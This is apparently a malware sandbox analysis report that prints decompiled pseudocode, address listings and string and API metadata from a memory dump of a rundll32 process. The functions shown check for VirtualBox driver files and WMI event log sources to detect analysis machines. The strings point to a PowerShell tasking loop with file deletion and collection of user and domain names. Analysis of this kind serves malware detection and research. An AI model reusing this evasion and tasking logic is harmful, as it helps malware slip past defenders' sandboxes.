                				_t701 = _t1824 + 0x1d0; // 0x1d3
                				_t959 = E00000285285C8056820(_t958, _t1005, _t701);
                				_t702 = _t1824 + 0x2d8; // 0x2db
                				_t960 = E00000285285C8056820(_t959, _t1005, _t702);
                				_t703 = _t1824 + 0x370; // 0x373
                				_t961 = E00000285285C8056820(_t960, _t1005, _t703);
                				_t704 = _t1824 + 0x1b0; // 0x1b3
                				E00000285285C8056820(_t961, _t1005, _t704);
                				_t705 = _t1824 + 0xd0; // 0xd3
                				_t963 = E00000285285C80576D0(_t1364,  *((intOrPtr*)(_t1824 + 0xb8)), _t705, _t1823);
                				_t706 = _t1824 + 0x190; // 0x193
                				_t965 = E00000285285C8056820(E00000285285C8056820(_t963, _t1005, _t706), _t1005, _t1826 + 0x50);
                				goto 0xc805c0ab;
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				asm("int3");
                				0xc80caadc();
                				_t708 = _t1824 + 0x150; // 0x153
                				E00000285285C8056820(_t965, _t1005, _t708);
                				return 0;
                			}
                0x285c805b365
                0x285c805b37a
                0x285c805b37d
                0x285c805b37d
                0x285c805b38a
                0x285c805b39e
                0x285c805b3a6
                0x285c805b3ad
                0x285c805b3b4
                0x285c805b3bb
                0x285c805b3c2
                0x285c805b3ce
                0x285c805b3d4
                0x285c805b3e9
                0x285c805b3f0
                0x285c805b3f6
                0x285c805b3fc
                0x285c805b406
                0x285c805b40f
                0x285c805b414
                0x285c805b420
                0x285c805b424
                0x285c805b427
                0x285c805b437
                0x285c805b43d
                0x285c805b43f
                0x285c805b442
                0x285c805b44f
                0x285c805b463
                0x285c805b469
                0x285c805b478
                0x285c805b480
                0x285c805b495
                0x285c805b4a2
                0x285c805b4a7
                0x285c805b4b1
                0x285c805b4ba
                0x285c805b4bf
                0x285c805b4cb
                0x285c805b4cf
                0x285c805b4d2
                0x285c805b4e2
                0x285c805b4e8
                0x285c805b4ed
                0x285c805b4fb
                0x285c805b512
                0x285c805b51b
                0x285c805b522
                0x285c805b527
                0x285c805b52c
                0x285c805b531
                0x285c805b538
                0x285c805b53f
                0x285c805b546
                0x285c805b556
                0x285c805b561
                0x285c805b566
                0x285c805b57c
                0x285c805b589
                0x285c805b590
                0x285c805b59d
                0x285c805b5a4
                0x285c805b5aa
                0x285c805b5b1
                0x285c805b5b8
                0x285c805b5bf
                0x285c805b5c5
                0x285c805b5cc
                0x285c805b5d2
                0x285c805b5d9
                0x285c805b5de
                0x285c805b5e1
                0x285c805b5e8
                0x285c805b5ef
                0x285c805b5f5
                0x285c805b5f9
                0x285c805b5ff
                0x285c805b606
                0x285c805b610
                0x285c805b616
                0x285c805b620
                0x285c805b627
                0x285c805b62d
                0x285c805b634
                0x285c805b641
                0x285c805b648
                0x285c805b655
                0x285c805b65c
                0x285c805b662
                0x285c805b669
                0x285c805b66e
                0x285c805b675
                0x285c805b67c
                0x285c805b68d
                0x285c805b691
                0x285c805b698
                0x285c805b69e
                0x285c805b6a5
                0x285c805b6ad
                0x285c805b6b7
                0x285c805b6c3
                0x285c805b6ca
                0x285c805b6d3
                0x285c805b6d7
                0x285c805b6dd
                0x285c805b6e4
                0x285c805b6eb
                0x285c805b6ef
                0x285c805b6f4
                0x285c805b6fb
                0x285c805b6ff
                0x285c805b706
                0x285c805b70a
                0x285c805b710
                0x285c805b717
                0x285c805b71d
                0x285c805b724
                0x285c805b729
                0x285c805b730
                0x285c805b736
                0x285c805b73a
                0x285c805b742
                0x285c805b746
                0x285c805b74d
                0x285c805b75a
                0x285c805b760
                0x285c805b767
                0x285c805b76c
                0x285c805b776
                0x285c805b778
                0x285c805b77f
                0x285c805b783
                0x285c805b789
                0x285c805b790
                0x285c805b796
                0x285c805b79d
                0x285c805b7a2
                0x285c805b7ac
                0x285c805b7b7
                0x285c805b7bd
                0x285c805b7c4
                0x285c805b7ca
                0x285c805b7d9
                0x285c805b7de
                0x285c805b7e5
                0x285c805b7eb
                0x285c805b7f5
                0x285c805b808
                0x285c805b80b
                0x285c805b80f
                0x285c805b816
                0x285c805b827
                0x285c805b829
                0x285c805b836
                0x285c805b849
                0x285c805b84f
                0x285c805b853
                0x285c805b85d
                0x285c805b862
                0x285c805b869
                0x285c805b86e
                0x285c805b874
                0x285c805b87b
                0x285c805b881
                0x285c805b888
                0x285c805b892
                0x285c805b89b
                0x285c805b8a0
                0x285c805b8a8
                0x285c805b8ac
                0x285c805b8b0
                0x285c805b8b8
                0x285c805b8be
                0x285c805b8c9
                0x285c805b8d2
                0x285c805b8d8
                0x285c805b8df
                0x285c805b8e5
                0x285c805b8ec
                0x285c805b8f6
                0x285c805b8fc
                0x285c805b906
                0x285c805b919
                0x285c805b91c
                0x285c805b920
                0x285c805b927
                0x285c805b92d
                0x285c805b932
                0x285c805b937
                0x285c805b938
                0x285c805b93d
                0x285c805b93e
                0x285c805b943
                0x285c805b944
                0x285c805b94a
                0x285c805b94f
                0x285c805b950
                0x285c805b955
                0x285c805b956
                0x285c805b95b
                0x285c805b95c
                0x285c805b962
                0x285c805b967
                0x285c805b968
                0x285c805b96d
                0x285c805b96e
                0x285c805b973
                0x285c805b974
                0x285c805b97a
                0x285c805b97f
                0x285c805b980
                0x285c805b985
                0x285c805b986
                0x285c805b98b
                0x285c805b98c
                0x285c805b992
                0x285c805b997
                0x285c805b998
                0x285c805b99d
                0x285c805b99e
                0x285c805b9a3
                0x285c805b9a4
                0x285c805b9aa
                0x285c805b9af
                0x285c805b9b0
                0x285c805b9b5
                0x285c805b9b6
                0x285c805b9bb
                0x285c805b9bc
                0x285c805b9c2
                0x285c805b9c9
                0x285c805b9d7
                0x285c805b9db
                0x285c805b9e5
                0x285c805b9ec
                0x285c805b9f1
                0x285c805b9f1
                0x285c805b9f8
                0x285c805b9fd
                0x285c805ba04
                0x285c805ba0b
                0x285c805ba12
                0x285c805ba19
                0x285c805ba26
                0x285c805ba2d
                0x285c805ba32
                0x285c805ba3b
                0x285c805ba40
                0x285c805ba4a
                0x285c805ba51
                0x285c805ba56
                0x285c805ba5d
                0x285c805ba69
                0x285c805ba70
                0x285c805ba7d
                0x285c805ba84
                0x285c805ba8a
                0x285c805ba92
                0x285c805ba99
                0x285c805baa2
                0x285c805baa9
                0x285c805bab2
                0x285c805bab9
                0x285c805babf
                0x285c805bac6
                0x285c805bacc
                0x285c805bad3
                0x285c805badf
                0x285c805bae6
                0x285c805baeb
                0x285c805baf2
                0x285c805baf9
                0x285c805bb05
                0x285c805bb0c
                0x285c805bb18
                0x285c805bb1f
                0x285c805bb24
                0x285c805bb33
                0x285c805bb38
                0x285c805bb47
                0x285c805bb4e
                0x285c805bb55
                0x285c805bb5b
                0x285c805bb62
                0x285c805bb68
                0x285c805bb6f
                0x285c805bb75
                0x285c805bb7c
                0x285c805bb81
                0x285c805bb86
                0x285c805bb8f
                0x285c805bb91
                0x285c805bb96
                0x285c805bb9d
                0x285c805bba4
                0x285c805bbab
                0x285c805bbb2
                0x285c805bbb7
                0x285c805bbbd
                0x285c805bbc0
                0x285c805bbc7
                0x285c805bbce
                0x285c805bbd3
                0x285c805bbd7
                0x285c805bbdb
                0x285c805bbe3
                0x285c805bbe7
                0x285c805bbeb
                0x285c805bbf8
                0x285c805bbfc
                0x285c805bc02
                0x285c805bc0a
                0x285c805bc11
                0x285c805bc1a
                0x285c805bc1e
                0x285c805bc28
                0x285c805bc2e
                0x285c805bc32
                0x285c805bc38
                0x285c805bc45
                0x285c805bc4a
                0x285c805bc51
                0x285c805bc56
                0x285c805bc58
                0x285c805bc5d
                0x285c805bc5e
                0x285c805bc65
                0x285c805bc67
                0x285c805bc6c
                0x285c805bc6d
                0x285c805bc74
                0x285c805bc76
                0x285c805bc7b
                0x285c805bc80
                0x285c805bc82
                0x285c805bc87
                0x285c805bc8b
                0x285c805bc90
                0x285c805bc98
                0x285c805bc9c
                0x285c805bca0
                0x285c805bcab
                0x285c805bcb0
                0x285c805bcba
                0x285c805bcbf
                0x285c805bcc1
                0x285c805bcc6
                0x285c805bcc7
                0x285c805bcce
                0x285c805bcd0
                0x285c805bcd5
                0x285c805bcd6
                0x285c805bcdd
                0x285c805bcdf
                0x285c805bce4
                0x285c805bce9
                0x285c805bceb
                0x285c805bcf0
                0x285c805bcf4
                0x285c805bcf9
                0x285c805bd04
                0x285c805bd0b
                0x285c805bd12
                0x285c805bd1f
                0x285c805bd23
                0x285c805bd2c
                0x285c805bd2f
                0x285c805bd36
                0x285c805bd3a
                0x285c805bd3f
                0x285c805bd4c
                0x285c805bd50
                0x285c805bd55
                0x285c805bd5b
                0x285c805bd5d
                0x285c805bd6a
                0x285c805bd6c
                0x285c805bd79
                0x285c805bd7e
                0x285c805bd81
                0x285c805bd89
                0x285c805bd95
                0x285c805bd9e
                0x285c805bda5
                0x285c805bdaa
                0x285c805bdb1
                0x285c805bdb6
                0x285c805bdbd
                0x285c805bdc4
                0x285c805bdcb
                0x285c805bdcf
                0x285c805bdf0
                0x285c805bdf5
                0x285c805bdf9
                0x285c805be00
                0x285c805be05
                0x285c805be10
                0x285c805be15
                0x285c805be1f
                0x285c805be24
                0x285c805be26
                0x285c805be2b
                0x285c805be2c
                0x285c805be33
                0x285c805be35
                0x285c805be3a
                0x285c805be3b
                0x285c805be42
                0x285c805be44
                0x285c805be49
                0x285c805be4e
                0x285c805be50
                0x285c805be55
                0x285c805be59
                0x285c805be5e
                0x285c805be67
                0x285c805be6c
                0x285c805be71
                0x285c805be80
                0x285c805be87
                0x285c805be8f
                0x285c805be94
                0x285c805be9b
                0x285c805bea0
                0x285c805bea2
                0x285c805bea7
                0x285c805bea8
                0x285c805beaf
                0x285c805beb1
                0x285c805beb6
                0x285c805beb7
                0x285c805bebe
                0x285c805bec0
                0x285c805bec5
                0x285c805beca
                0x285c805becc
                0x285c805bed1
                0x285c805bed5
                0x285c805beda
                0x285c805bee2
                0x285c805bee6
                0x285c805bef4
                0x285c805bf2d
                0x285c805bf32
                0x285c805bf35
                0x285c805bf3d
                0x285c805bf44
                0x285c805bf4c
                0x285c805bf51
                0x285c805bf58
                0x285c805bf5d
                0x285c805bf5f
                0x285c805bf64
                0x285c805bf65
                0x285c805bf6c
                0x285c805bf6e
                0x285c805bf73
                0x285c805bf74
                0x285c805bf7b
                0x285c805bf7d
                0x285c805bf82
                0x285c805bf87
                0x285c805bf89
                0x285c805bf8e
                0x285c805bf92
                0x285c805bf97
                0x285c805bf9f
                0x285c805bfa3
                0x285c805bfa7
                0x285c805bfae
                0x285c805bfb4
                0x285c805bfbb
                0x285c805bfc1
                0x285c805bfd0
                0x285c805bfd6
                0x285c805bfda
                0x285c805bfe0
                0x285c805bfe7
                0x285c805bfed
                0x285c805bff4
                0x285c805bffa
                0x285c805c001
                0x285c805c007
                0x285c805c00e
                0x285c805c014
                0x285c805c01b
                0x285c805c021
                0x285c805c028
                0x285c805c02e
                0x285c805c035
                0x285c805c03b
                0x285c805c042
                0x285c805c048
                0x285c805c04f
                0x285c805c055
                0x285c805c05c
                0x285c805c062
                0x285c805c074
                0x285c805c079
                0x285c805c07b
                0x285c805c080
                0x285c805c081
                0x285c805c086
                0x285c805c087
                0x285c805c08c
                0x285c805c08d
                0x285c805c093
                0x285c805c098
                0x285c805c099
                0x285c805c09e
                0x285c805c09f
                0x285c805c0a4
                0x285c805c0a5
                0x285c805c0ab
                0x285c805c0b2
                0x285c805c0d3

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Similarity
                • API ID: Sleep$FolderPathSpecial$ProcessTerminateThreadUninitializelstrcat$CurrentInitializeThread32$CloseCreateFirstHandleNextObjectOpenSecuritySingleSnapshotToolhelp32Wait
                • String ID: -Recurse"$" -Force$127.0.0.1$; Remove-Item -Path "$Command : $Domain name: $User name: $\wab.exe$dex$dij$file_entry_point$gdt$iKInPE9WrB$ins$powershell$response_status$sdl$shi$task$task_data$task_id$tasks
                • API String ID: 3213461338-3323971348
                • Opcode ID: ef9d4ee9269239150bda406fe7dbdd15bbfd50020378915354a866fec66954a0
                • Instruction ID: de8b85655ce9ef5537560a95cc3666cb4d6fc366c3e244ebb60c1fbca4a3f89a
                • Opcode Fuzzy Hash: ef9d4ee9269239150bda406fe7dbdd15bbfd50020378915354a866fec66954a0
                • Instruction Fuzzy Hash: 1B13BE2A212FE0D9EB20DF70D8593ED23A1F741388F409523DA5967ADADF78C648CB14
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 55%
                			E00000285285C809D4D0(void* __ecx, long long __rbx, signed long long __rdi, long long __rsi) {
                				signed char _t67;
                				void* _t83;
                				void* _t87;
                				signed long long _t100;
                				signed long long _t121;
                				void* _t142;
                				signed long long _t147;
                				WCHAR* _t152;
                				void* _t153;
                				void* _t155;
                				signed long long _t156;
                				void* _t158;
                
                				_t147 = __rdi;
                				_t75 = __ecx;
                				 *((long long*)(_t155 + 8)) = __rbx;
                				 *((long long*)(_t155 + 0x10)) = __rsi;
                				 *((long long*)(_t155 + 0x18)) = __rdi;
                				_t153 = _t155 - 0x5f0;
                				_t156 = _t155 - 0x6f0;
                				_t100 =  *0xc814c720; // 0xee50a592130
                				 *(_t153 + 0x5e0) = _t100 ^ _t156;
                				 *((long long*)(_t156 + 0x30)) = L"System32\\drivers\\VBoxMouse.sys";
                				r8d = 0x208;
                				 *((long long*)(_t156 + 0x38)) = L"System32\\drivers\\VBoxGuest.sys";
                				 *((long long*)(_t156 + 0x40)) = L"System32\\drivers\\VBoxSF.sys";
                				 *((long long*)(_t156 + 0x48)) = L"System32\\drivers\\VBoxVideo.sys";
                				 *((long long*)(_t156 + 0x50)) = L"System32\\vboxdisp.dll";
                				 *((long long*)(_t156 + 0x58)) = L"System32\\vboxhook.dll";
                				 *((long long*)(_t156 + 0x60)) = L"System32\\vboxmrxnp.dll";
                				 *((long long*)(_t156 + 0x68)) = L"System32\\vboxogl.dll";
                				 *((long long*)(_t156 + 0x70)) = L"System32\\vboxoglarrayspu.dll";
                				 *((long long*)(_t156 + 0x78)) = L"System32\\vboxoglcrutil.dll";
                				 *((long long*)(_t153 - 0x80)) = L"System32\\vboxoglerrorspu.dll";
                				 *((long long*)(_t153 - 0x78)) = L"System32\\vboxoglfeedbackspu.dll";
                				 *((long long*)(_t153 - 0x70)) = L"System32\\vboxoglpackspu.dll";
                				 *((long long*)(_t153 - 0x68)) = L"System32\\vboxoglpassthroughspu.dll";
                				 *((long long*)(_t153 - 0x60)) = L"System32\\vboxservice.exe";
                				 *((long long*)(_t153 - 0x58)) = L"System32\\vboxtray.exe";
                				 *((long long*)(_t153 - 0x50)) = L"System32\\VBoxControl.exe";
                				E00000285285C80C8EF0(__ecx, 0, _t83, _t87, _t153 + 0x1d0, _t142, __rdi, _t158);
                				r8d = 0x208;
                				E00000285285C80C8EF0(_t75, 0, _t83, _t87, _t153 - 0x40, _t142, _t147, _t158);
                				 *(_t156 + 0x28) = _t147;
                				GetWindowsDirectoryW(_t152);
                				if (E00000285285C80A00A0() == 0) goto 0xc809d617;
                				__imp__Wow64DisableWow64FsRedirection();
                				_t121 = _t147;
                				__imp__PathCombineW();
                				r8d = 0x200;
                				E00000285285C80C8EF0(_t75, 0, 0, _t87, _t153 + 0x3e0, _t153 + 0x1d0, _t147,  *((intOrPtr*)(_t156 + 0x30 + _t121 * 8)));
                				E00000285285C809D1D0(_t75, L"System32\\VBoxControl.exe", _t153 + 0x3e0, _t153 + 0x1d0, L"Checking file %s ", _t153 - 0x40);
                				_t67 = GetFileAttributesW(??); // executed
                				if (_t67 == 0xffffffff) goto 0xc809d679;
                				if ((_t67 & 0x00000010) == 0) goto 0xc809d684;
                				if (_t121 + 1 - 0x11 < 0) goto 0xc809d620;
                				goto 0xc809d689;
                				 *((intOrPtr*)(_t156 + 0x20)) = 0;
                				if ( *0xc814e430 == 8) goto 0xc809d6b2;
                				if (1 - 0x1e < 0) goto 0xc809d6a0;
                				goto 0xc809d711;
                				if ( *0x285C814E484 == dil) goto 0xc809d711;
                				if ( *0xc814e430 == 8) goto 0xc809d6da;
                				if (1 - 0x1e < 0) goto 0xc809d6c8;
                				goto 0xc809d6ef;
                				if ( *0x285C814E46C == dil) goto 0xc809d6ef;
                				GetCurrentProcess();
                				 *((long long*)( *0x285C814E488))();
                				if ( *((intOrPtr*)(_t156 + 0x20)) == 0) goto 0xc809d711;
                				__imp__Wow64RevertWow64FsRedirection();
                				return E00000285285C80C59D0(1,  *(_t153 + 0x5e0) ^ _t156, _t156 + 0x20, _t153 - 0x40);
                			}

                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Similarity
                • API ID: Wow64$Redirection$AttributesCombineCurrentDirectoryDisableFilePathProcessRevertWindows
                • String ID: Checking file %s $System32\VBoxControl.exe$System32\drivers\VBoxGuest.sys$System32\drivers\VBoxMouse.sys$System32\drivers\VBoxSF.sys$System32\drivers\VBoxVideo.sys$System32\vboxdisp.dll$System32\vboxhook.dll$System32\vboxmrxnp.dll$System32\vboxogl.dll$System32\vboxoglarrayspu.dll$System32\vboxoglcrutil.dll$System32\vboxoglerrorspu.dll$System32\vboxoglfeedbackspu.dll$System32\vboxoglpackspu.dll$System32\vboxoglpassthroughspu.dll$System32\vboxservice.exe$System32\vboxtray.exe
                • API String ID: 2137468328-1036852472
                • Opcode ID: 516fd082578d430764e9c848e0d414f1b568b980de21ec9c37c941b3060ac9f4
                • Instruction ID: e93811a8e085996fd56fc3ec57e9e7e56fa441ac3ce85551b00dc6d3de6a61f0
                • Opcode Fuzzy Hash: 516fd082578d430764e9c848e0d414f1b568b980de21ec9c37c941b3060ac9f4
                • Instruction Fuzzy Hash: A9616C3A612FA099EB10CF14E8482D9B3E5F784795F908227DA8D537A8EF3CC645CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 958 285c809dcc0-285c809dd22 call 285c80a0410 961 285c809dd28-285c809dd68 SysAllocString * 2 958->961 962 285c809dfcb-285c809dfce 958->962 964 285c809ddc0-285c809ddc3 961->964 965 285c809dd6a-285c809dd6d 961->965 963 285c809dfb2-285c809dfca call 285c80c59d0 962->963 967 285c809ddce-285c809ddd0 964->967 968 285c809ddc5-285c809ddc8 SysFreeString 964->968 969 285c809dd6f-285c809dd8c 965->969 970 285c809ddb7-285c809ddba SysFreeString 965->970 972 285c809df97-285c809dfaa 967->972 973 285c809ddd6-285c809dde5 967->973 968->967 974 285c809dd96-285c809dd98 969->974 970->964 972->963 975 285c809df77-285c809df91 CoUninitialize 973->975 976 285c809ddeb 973->976 974->970 977 285c809dd9a-285c809ddb1 CoUninitialize 974->977 975->972 978 285c809ddf3-285c809ddf6 976->978 977->970 980 285c809df6f 978->980 981 285c809ddfc-285c809de1a 978->981 980->975 985 285c809de20-285c809de44 981->985 986 285c809df6b 981->986 990 285c809df52-285c809df63 985->990 991 285c809de4a-285c809de52 985->991 986->980 990->978 997 285c809df69 990->997 991->990 992 285c809de58-285c809de5a 991->992 993 285c809de60-285c809de73 StrCmpIW 992->993 994 285c809df48-285c809df4c VariantClear 992->994 993->994 996 285c809de79-285c809deb8 VariantClear SafeArrayAccessData 993->996 994->990 996->994 999 285c809debe-285c809deee SafeArrayGetLBound SafeArrayGetUBound 996->999 997->980 1000 285c809df3f-285c809df42 SafeArrayUnaccessData 999->1000 1001 285c809def0-285c809df08 SafeArrayGetElement 999->1001 1000->994 1002 285c809df10-285c809df1e call 285c80d19f0 1001->1002 1005 285c809df20-285c809df29 1002->1005 1006 285c809df39 1002->1006 1005->1002 1007 285c809df2b-285c809df35 1005->1007 1006->1000 1007->1001 1008 285c809df37 1007->1008 1008->1000
                C-Code - Quality: 24%
                			E00000285285C809DCC0(void* __edx, long long __rbx, long long __rdi, long long __rsi, long long __r14) {
                				void* _t80;
                				void* _t81;
                				signed char _t87;
                				void* _t88;
                				intOrPtr _t91;
                				void* _t100;
                				void* _t109;
                				signed long long _t130;
                				long long _t134;
                				intOrPtr* _t153;
                				long long _t189;
                				void* _t191;
                				void* _t192;
                				signed long long _t193;
                				long long _t203;
                				void* _t207;
                
                				_t189 = __rsi;
                				_t191 = _t192 - 0x47;
                				_t193 = _t192 - 0xb0;
                				_t130 =  *0xc814c720; // 0xee50a592130
                				 *(_t191 + 0x37) = _t130 ^ _t193;
                				r12d = 0;
                				 *((long long*)(_t191 + 0x1f)) = L"vboxvideo";
                				 *((long long*)(_t191 - 0x21)) = _t203;
                				 *((long long*)(_t191 + 0x27)) = L"VBoxVideoW8";
                				_t134 = L"VBoxWddm";
                				 *((long long*)(_t191 - 0x11)) = _t203;
                				 *((long long*)(_t191 + 0x2f)) = _t134;
                				r15d = r12d;
                				 *((long long*)(_t191 - 0x29)) = _t203;
                				_t81 = E00000285285C80A0410(_t80, _t191 - 0x21, _t191 - 0x11, __rsi); // executed
                				if (_t81 == 0) goto 0xc809dfcb;
                				 *((long long*)(_t193 + 0xd0)) = __rbx;
                				 *((long long*)(_t193 + 0xd8)) = _t189;
                				 *((long long*)(_t193 + 0xe0)) = __rdi;
                				__imp__#2();
                				__imp__#2();
                				if (_t134 == 0) goto 0xc809ddc0;
                				if (_t134 == 0) goto 0xc809ddb7;
                				 *((long long*)(_t193 + 0x28)) = _t191 - 0x29;
                				_t18 = _t203 + 0x30; // 0x30
                				r9d = _t18;
                				 *((long long*)(_t193 + 0x20)) = _t203;
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0xa0))() >= 0) goto 0xc809ddb7;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))) + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (_t134 == 0) goto 0xc809ddce;
                				__imp__#6();
                				if (r12d == 0) goto 0xc809df97;
                				_t153 =  *((intOrPtr*)(_t191 - 0x29));
                				 *((long long*)(_t191 - 0x31)) = _t203;
                				 *((intOrPtr*)(_t191 - 0x35)) = r12d;
                				if (_t153 == 0) goto 0xc809df77;
                				 *((long long*)(_t193 + 0xe8)) = __r14;
                				if (r15d != 0) goto 0xc809df6f;
                				 *((long long*)(_t193 + 0x20)) = _t191 - 0x35;
                				_t32 = _t207 + 1; // 0x1, executed
                				r8d = _t32;
                				 *((intOrPtr*)( *_t153 + 0x20))();
                				if ( *((intOrPtr*)(_t191 - 0x35)) == r12d) goto 0xc809df6b;
                				 *((long long*)(_t193 + 0x28)) = _t203;
                				r8d = 0;
                				 *((long long*)(_t193 + 0x20)) = _t203;
                				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x20))() < 0) goto 0xc809df52;
                				_t87 =  *(_t191 - 9) & 0x0000ffff;
                				if (_t87 == 1) goto 0xc809df52;
                				if ((_t87 & 0x00000008) == 0) goto 0xc809df48;
                				__imp__StrCmpIW();
                				if (_t87 != 0) goto 0xc809df48;
                				__imp__#9();
                				 *((long long*)(_t193 + 0x28)) = _t203;
                				r8d = 0;
                				 *((long long*)(_t193 + 0x20)) = _t203;
                				_t88 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x20))();
                				__imp__#23();
                				if (_t88 < 0) goto 0xc809df48;
                				__imp__#20();
                				__imp__#19();
                				_t109 =  *((intOrPtr*)(_t191 - 0x19)) -  *((intOrPtr*)(_t191 - 0x15)) + 1;
                				 *((intOrPtr*)(_t191 - 0x39)) = r12d;
                				if (_t109 <= 0) goto 0xc809df3f;
                				__imp__#25(); // executed
                				if (E00000285285C80D19F0( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))),  *((intOrPtr*)(_t191 + 0xf)),  *((intOrPtr*)(_t191 + 0x1f))) == 0) goto 0xc809df39;
                				if (r12d + 1 - 3 < 0) goto 0xc809df10;
                				_t91 =  *((intOrPtr*)(_t191 - 0x39)) + 1;
                				 *((intOrPtr*)(_t191 - 0x39)) = _t91;
                				if (_t91 - _t109 < 0) goto 0xc809def0;
                				goto 0xc809df3f;
                				r15d = 1;
                				__imp__#24();
                				__imp__#9();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x31)))) + 0x10))();
                				if ( *((intOrPtr*)(_t191 - 0x29)) != 0) goto 0xc809ddf3;
                				goto 0xc809df6f;
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x29)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x21)))) + 0x10))();
                				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))) + 0x10))();
                				__imp__CoUninitialize(); // executed
                				return E00000285285C80C59D0(_t100,  *(_t191 + 0x37) ^ _t193,  *((intOrPtr*)( *((intOrPtr*)(_t191 - 0x11)))), _t191 - 9);
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ArraySafe$String$AllocBoundClearDataFreeUninitializeVariant$AccessElementInitializeUnaccess
                • String ID: FileName$SELECT * FROM Win32_NTEventlogFile$Sources$System$VBoxVideoW8$VBoxWddm$WQL$vboxvideo
                • API String ID: 1020912672-1865646205
                • Opcode ID: ebca8437b3c2ed639850c6906fb2360f3bc395bfb2ef804b47d7745ce4c00649
                • Instruction ID: 3ce6876fc0b31ec93f8d48dca30af4625a2eb84ca57fc51852e23fc91a943a51
                • Opcode Fuzzy Hash: ebca8437b3c2ed639850c6906fb2360f3bc395bfb2ef804b47d7745ce4c00649
                • Instruction Fuzzy Hash: 1C91173A702F6486EB20CF65E45879C73B5F748B8AF408512DE5A67B58DF38C549CB40
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 21%
                			E00000285285C809EA60(void* __edx, void* __rax, long long __rdi, long long __rsi, long long __r12, long long __r14, char _a8, void* _a16, void* _a24, void* _a32) {
                				long long _v32;
                				long long _v40;
                				long long _v48;
                				long long _v56;
                				intOrPtr _v72;
                				signed int _v80;
                				void* _v88;
                				long long _v96;
                				long long _v104;
                				void* __rbx;
                				void* _t71;
                				void* _t72;
                				signed char _t78;
                				signed char _t81;
                				signed char _t84;
                				void* _t94;
                				void* _t128;
                				intOrPtr* _t137;
                				long long _t167;
                				void* _t180;
                				long long _t185;
                
                				_t167 = __rsi;
                				r15d = 0;
                				_a32 = _t185;
                				_v88 = _t185;
                				_a24 = _t185;
                				_t72 = E00000285285C80A0410(_t71,  &_a32,  &_v88, __rsi); // executed
                				if (_t72 == 0) goto 0xc809ece3;
                				_v32 = _t167;
                				_v40 = __rdi;
                				_v48 = __r12;
                				_v56 = __r14;
                				__imp__#2();
                				__imp__#2();
                				r12d = 1;
                				r14d = r12d;
                				if (__rax == 0) goto 0xc809eb2a;
                				if (__rax == 0) goto 0xc809eb21;
                				_v96 =  &_a24;
                				_t13 = _t185 + 0x30; // 0x30
                				r9d = _t13;
                				_v104 = _t185;
                				_t179 =  *_a32;
                				if ( *((intOrPtr*)( *_a32 + 0xa0))() >= 0) goto 0xc809eb21;
                				r14d = r15d;
                				 *((intOrPtr*)( *_a32 + 0x10))();
                				 *((intOrPtr*)( *_v88 + 0x10))();
                				__imp__CoUninitialize();
                				__imp__#6();
                				if (__rax == 0) goto 0xc809eb3d;
                				__imp__#6();
                				if (r14d == 0) goto 0xc809ecd3;
                				_t137 = _a24;
                				_a16 = _t185;
                				_a8 = r15d;
                				if (_t137 == 0) goto 0xc809ecb3;
                				asm("o16 nop [eax+eax]");
                				_v104 =  &_a8;
                				r8d = r12d; // executed
                				 *((intOrPtr*)( *_t137 + 0x20))();
                				if (_a8 == r15d) goto 0xc809ecaf;
                				_v96 = _t185;
                				r8d = 0;
                				_v104 = _t185;
                				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xc809ebe8;
                				_t78 = _v80 & 0x0000ffff;
                				if (_t78 == r12w) goto 0xc809ebe8;
                				if ((_t78 & 0x00000008) == 0) goto 0xc809ebde;
                				E00000285285C80C9740(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
                				_t92 =  !=  ? r12d : r15d;
                				__imp__#9();
                				_v96 = _t185;
                				r8d = 0;
                				_v104 = _t185;
                				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xc809ec3d;
                				_t81 = _v80 & 0x0000ffff;
                				if (_t81 == r12w) goto 0xc809ec3d;
                				if ((_t81 & 0x00000008) == 0) goto 0xc809ec33;
                				E00000285285C80C9740(_t128, _v72, L"VBOX", _v32,  *_a32, _t180);
                				_t93 =  !=  ? r12d :  !=  ? r12d : r15d;
                				__imp__#9();
                				_v96 = _t185;
                				r8d = 0;
                				_v104 = _t185;
                				if ( *((intOrPtr*)( *_a16 + 0x20))() < 0) goto 0xc809ec92;
